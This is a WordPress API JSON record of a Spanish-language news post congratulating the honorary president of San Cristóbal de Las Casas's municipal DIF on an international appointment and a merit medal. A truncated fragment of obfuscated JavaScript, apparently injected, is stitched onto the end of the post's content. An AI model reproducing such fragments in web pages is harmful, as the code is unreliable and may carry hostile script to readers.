{"id":25797,"date":"2025-12-15T13:12:01","date_gmt":"2025-12-15T13:12:01","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25797"},"modified":"2025-12-15T13:16:46","modified_gmt":"2025-12-15T13:16:46","slug":"felicitan-a-presidenta-del-dif-de-sclc-por-el-nombramiento-como-vicepresidenta-internacional-del-instituto-de-mejores-gobiernos-y-la-medalla-al-merito-ben-lamat-2025","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25797","title":{"rendered":"Felicitan a presidenta del DIF de SCLC por el nombramiento como Vicepresidenta Internacional del Instituto de Mejores Gobiernos y la Medalla al M\u00e9rito Ben Lamat 2025"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"819\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-15-at-7.10.30-AM-819x1024.jpeg\" alt=\"\" class=\"wp-image-25798\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-15-at-7.10.30-AM-819x1024.jpeg 819w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-15-at-7.10.30-AM-240x300.jpeg 240w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-15-at-7.10.30-AM-768x960.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/WhatsApp-Image-2025-12-15-at-7.10.30-AM.jpeg 960w\" sizes=\"auto, (max-width: 819px) 100vw, 819px\" \/><\/figure>\n\n\n\n<p>05 diciembre 2025<\/p>\n\n\n\n<p>Felicitamos con gran orgullo a nuestra Presidenta Honoraria del DIF Municipal de San Crist\u00f3bal de Las Casas, C. Bertha Guadalupe Diestel Alfaro; quien recibi\u00f3 el nombramiento como Vicepresidenta Internacional del Instituto de Mejores Gobiernos y la Medalla al M\u00e9rito Ben Lamat 2025, otorgados en el marco de la Cumbre Mundial de Municipalistas.<\/p>\n\n\n\n<p>Estos reconocimientos destacan su trabajo incansable, su compromiso humano y la visi\u00f3n sensible con la que impulsa cada acci\u00f3n dentro de esta noble instituci\u00f3n.<br>Su liderazgo fortalece nuestro prop\u00f3sito de seguir construyendo bienestar y esperanza para las familias sancristobalenses.<\/p>\n\n\n\n<p>\u00a1Enhorabuena por este merecido logro! ??<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>05 diciembre 2025 Felicitamos con gran orgullo a nuestra Presidenta Honoraria del DIF Municipal de San Crist\u00f3bal de Las Casas, C. Bertha Guadalupe Diestel Alfaro; quien recibi\u00f3 el nombramiento como Vicepresidenta Internacional del Instituto de Mejores Gobiernos y la Medalla al M\u00e9rito Ben Lamat 2025, otorgados en el marco de la Cumbre Mundial de Municipalistas. &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25798,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,20],"tags":[],"class_list":["post-25797","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas","category-minuto"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25797","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25797"}],"version-history":[{"count":2,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25797\/revisions"}],"predecessor-version":[{"id":25806,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25797\/revisions\/25806"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25798"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25797"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25797"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25797"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}